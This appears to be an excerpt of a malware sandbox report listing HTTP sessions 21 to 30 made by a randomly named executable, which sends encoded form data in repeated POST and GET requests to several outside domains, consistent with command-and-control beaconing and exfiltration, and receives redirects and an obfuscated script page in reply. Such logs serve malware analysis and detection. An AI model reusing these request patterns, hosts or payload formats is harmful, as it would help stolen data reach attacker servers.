21 | 192.168.11.20 | 49753 | 31.217.192.158 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:33.457011938 CEST | 693 | OUT | POST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7j1DSwB6Fcig09iHQCbZ0zpllBnC5xmYscJWBdc4xee5vgsbX1rO4tLP4aOQmiEFl6PSnBBTX9vbSoXi8S0ubN2QXX6SAglkMr7yvRoA+HRMc+DtuJ90QFTmzwzqQnOKxnYBVeXvgx3sRAcIPj07aFb7basqIEBMBxM50N9+U6LrHnYfeClL+Gwg==
Oct 4, 2024 11:59:34.102020979 CEST | 383 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 09:58:44 GMT
                                                                                                                                                    server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.20 | 49754 | 31.217.192.158 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:36.205195904 CEST | 713 | OUT | POST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7jnTiwDbFcnA0+/3QCMJ03pl5BnHJhmq4cHWxdf5xeSZvgm7XsvO5hLPEkORaiEFx6PQPBUyX+tLSqeC8cwubN2QXX6SUOln8r6C/Rph+INcc9TNuJ50RMTmzSzrNAOI5nYEReX+gy9sQLYIOo47XLWobn9adaGvFPEPlXgMgeI4bVcvnqnJ/dttoE3SY1Gg1UBzsPyiDBsWg=
Oct 4, 2024 11:59:36.962382078 CEST | 383 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 09:58:47 GMT
                                                                                                                                                    server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.20 | 49755 | 31.217.192.158 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:38.947175980 CEST | 1289 | OUT | POST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Data Ascii: PbG=
Oct 4, 2024 11:59:38.947225094 CEST | 5629 | OUT
                                                                                                                                                    Data Ascii: M6e4V7OXDPt9FwJWU2He/FgV64UxgtMAL1ypM6K2fvBhiFIhCvZrkn4VuTYkeOXqMZ8z3Soq2E/h34ZZykJ2VyYWvOVE/i8JyZEqmuEXTy/v03vVMV9D+mcWRELVUtrk8mchmtWRWEeMUYeEXrbaVXxot1DIRevYpDgzX3eV3oc6zfaauO0ILZwobP7NitDucHXL5MWdYjbfqUoaUdpiraljSg0mX5Ooc65C1RjJMuArJb/zQtt
Oct 4, 2024 11:59:39.616698027 CEST | 383 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 09:58:49 GMT
                                                                                                                                                    server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.20 | 49756 | 31.217.192.158 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:41.672863007 CEST | 429 | OUT | GET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 11:59:42.268728971 CEST | 526 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 09:58:52 GMT
                                                                                                                                                    server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49757 | 191.101.104.164 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:47.847079992 CEST | 690 | OUT | POST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdJx5PPSeD1+8jQr7aR+fxUsRdPBx/DgsWhPTIC+LqXLOrUi8mPq6Gg6VclS6MwS25AlTaSCm+pj/3I8F6SSgeBYLNKSIza+V0tVy0ERVvE3nSS8vFUrzWRE80tizMZUDTVo6Ij2mLRVXuxSiNKoXcjymiucblZ8EFBeLDyF4+7djswcCcua0kbQ==
Oct 4, 2024 11:59:48.483172894 CEST | 1227 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:59:48 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 795
                                                                                                                                                    Connection: close
                                                                                                                                                    location: https://www.taketechai.com/6s2u/
                                                                                                                                                    platform: hostinger
                                                                                                                                                    panel: hpanel
                                                                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 84ecbcc4745dbe8cdac0c751dae85b57-bos-edge3
                                                                                                                                                    x-hcdn-cache-status: DYNAMIC
                                                                                                                                                    x-hcdn-upstream-rt: 0.535
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49758 | 191.101.104.164 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:50.477895021 CEST | 710 | OUT | POST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdLRpPN1yDze8sO77aIuf9UsddPA1WCVEWgvjID/LqarOrMy8jAK67g9chlTGMwSy5AhXaTxexrz/1QMF4WSgeBYLNKWhWa+N0tFC0LQVoannVXMvFFbzSRE9htjv2ZRHTVpKIjkeIIlXk8yjiCqmxkASemcffeuwBNoaZv3Ma4O/e0s70sY1/GXryKfYGMFH1p6zR8JCI5b0=
Oct 4, 2024 11:59:51.099893093 CEST | 1227 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:59:51 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 795
                                                                                                                                                    Connection: close
                                                                                                                                                    location: https://www.taketechai.com/6s2u/
                                                                                                                                                    platform: hostinger
                                                                                                                                                    panel: hpanel
                                                                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 165517dcc5785c231239468c03a282f6-bos-edge2
                                                                                                                                                    x-hcdn-cache-status: DYNAMIC
                                                                                                                                                    x-hcdn-upstream-rt: 0.521
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49759 | 191.101.104.164 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:53.101613045 CEST | 2578 | OUT | POST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdLRpPN1yDze8sO77aIuf9UsddPA1WCVcWgeDICcTqbrOrSi8iAK6cg85qlTLxwQ65DEDabgexiz/1M8F7SShEBYbJKSFWa+N0tGa0ChVoYnnSS8vJUrzqRAQWtjaBelzTVJaIv3mIAlXqySj6CqqykAeomcr5epMBeMbZ0FIisNHh6Y3+mIxwDm7rN5AfDBjwmJPbuJ+5udyFzIP1Fozn/fS6dMkmSBRrgcyoK8NZqhdTBAEIc83lzU8C7oFTMPqkUd/Nvq6ZIAROXVB4rlOjKjTNy7vQz7ovpKHPRbXJqo//5y0Lw5w0oEW3qbspmLIfuxNtu2sKLQw90v2Up9C50hpRGd3zx0oki5CFrc1HLBXfJGkS9u9yRABxe08GvRBg9qLI28/2djkatxyIqlyGW1VNLtvmGlJU8J6QvEJNZ1AyptfPF/d+UJfRNFBrdIIWP2tSVIwI00SLbIGtOANIqw0XrVF8tnjBmqdtNngh/xmUWmt2drkoWuqWF9UwfFTgP/sqlmRSGyNuv5EQabqBpbN5swW9rf7XBcWsiBjjX7O4HyC2Uxhl9t4SK9ot5BUL9iZ/+yzRL9Kw7ffqaJlyTw8ogzXzfxfhRnPyv82qNEsVzHrdWDXM5mT+0UCL0YbRLkwAyyshSEkl/BuUmun5SsD0KaqkFMJclGXdQre/DGixLpWHMws5sSiHVviOkryttkgdQJIjb+8QuyjV08S2jZsEOnMl6uHhakhbiI/QMhcb6KUJMP7aVVjn09GJBEBeCCFE1LGs7BH09J4+97YNNQzlf2K0+futUHJ3L2bcpTdjLqYDAToj/gG5PU1xLlgr6Z0uIn5C2rbOHzoezRzViMuPOT00uj579Ff6/qAIR9Mv05TV+MbwYI5MEAIa4rcZi2HX5/xZATeXlUxhhhZPekwxoKgremREDOIdYu5gqy1NoCK9a7pud7DAx18SR1z9lM306H5iMz5xxYX3/oMKiD6vavrhYt5VCZEe [TRUNCATED]
Oct 4, 2024 11:59:53.101636887 CEST | 4337 | OUT
                                                                                                                                                    Data Ascii: D61snbh6nPMF/jCwM6ddxhk/dTncXNz5tzgMXgsWV0xkRWHYwqd1DSQ/xuXlTTb8yInkHpFp5Fd58WK2DwodngTkkXgE3k3RhPt067bkbMvScsKsEEylIQ7UFNe3ETcC1jW+9k6R6ErS81PTiemT0ozfjj5JdKpw2o9+c0aQC7Ac6BwlFvhUC3BU49a+3VPLgS6s/jR3CGJGkCClNUrYzLsIwFIZhWunI6V9SjqyQB1yid6vuYv
Oct 4, 2024 11:59:53.725749016 CEST | 1227 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:59:53 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 795
                                                                                                                                                    Connection: close
                                                                                                                                                    location: https://www.taketechai.com/6s2u/
                                                                                                                                                    platform: hostinger
                                                                                                                                                    panel: hpanel
                                                                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 9efc779bb12926fc053d02d9b4856da9-bos-edge1
                                                                                                                                                    x-hcdn-cache-status: DYNAMIC
                                                                                                                                                    x-hcdn-upstream-rt: 0.524
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49760 | 191.101.104.164 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:55.726031065 CEST | 428 | OUT | GET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 11:59:55.826356888 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:59:55 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 4792
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 858c6aaf115336dd4d2eb4e067ddbddb-bos-edge1
                                                                                                                                                    Data Ascii: <html><head><title>Checking your browser before accessing. Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta http-equiv="refresh" content="30"><style>div{text-align:center}.loader{margin:auto;width:50px;padding:8px;aspect-ratio:1;border-radius:50%;background:#25b09b;--_m:conic-gradient(
Oct 4, 2024 11:59:55.826466084 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: #0000 10%,#000),linear-gradient(#000 0 0) content-box;-webkit-mask:var(--_m);mask:var(--_m);-webkit-mask-composite:source-out;mask-composite:subtract;animation:l3 1s infinite linear}@keyframes l3{to{transform:rotate(1turn)}}</style></head><bod
Oct 4, 2024 11:59:55.826479912 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: ncat','trace','{}.constructor(\x22return\x20this\x22)(\x20)','Content-Type','warn','1184299iAoMQM','send','info','apply','application/x-www-form-urlencoded','6689656NjkqqV','28DGQdGS','search','toString','9RrPAbC','(((.+)+)+)+$','__proto__','5
Oct 4, 2024 11:59:55.826589108 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: l++){var m=c[a3(0xe4,0xee)][a3(0xcb,0xd1)][a3(0xc8,0xbf)](c),n=k[l],o=j[n]||m;m[a3(0xdf,0xd8)]=c[a3(0xc8,0xba)](c),m[a3(0xdc,0xca)]=o['toString'][a3(0xc8,0xc2)](o),j[n]=m;}});b();var bbc6cf0=function a(z){function A(X,Y){return X>>>Y|X<<0x20-Y
Oct 4, 2024 11:59:55.826600075 CEST | 491 | IN
                                                                                                                                                    Data Ascii: 4e5d(h){return new Promise(i=>setTimeout(i,h));}((async()=>{await f28b4e5d(0xbb8);function a5(h,i){return g(i- -0x18d,h);}const h=await bbc6cf0(cjs);xhr=new XMLHttpRequest(),xhr['open'](a5(-0x8c,-0x9d),jsChallengeUrl),xhr[a5(-0xb8,-0xc2)](a5(-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49761 | 162.255.119.150 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:00:01.092529058 CEST | 702 | OUT | POST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFqZhz9cl/U8jILOSTc4s89glSRlec8o1CwzMzaKbAeAtyKUGXxbcviT7CQh3ie2ORuX8af75oo8FhoM6EnSpx117Xh4F91lFXku/cCNfd0Rt5ApLHv8ELjVRNq6joLK/MaEDnXT0keO2dfoWaLVcZwgELDqj0s8QCoEKBFcpD1pnyEAsK6h2AqQ==
Oct 4, 2024 12:00:01.206471920 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:01 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49762 | 162.255.119.150 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:00:03.737837076 CEST | 722 | OUT | POST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFo65z77J/ScjJVeSTVYsw9gpSRkKM8aRC1j8zL/3AZAtyC0GY1bc0iT3KQgLie1yRuVkacIRrosFjgs6Gpypx117Xh4Rb1l9XkevcDpre9xt6HpLHlcEPjVR7q+jGLI3MaB/nGi0rUO2TRIXxKWlL5C4tGrftopV8gybbYudn267AAwVi4j3b3d91gC4/BrwQPHLIhEkMYRA=
Oct 4, 2024 12:00:03.851988077 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:03 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
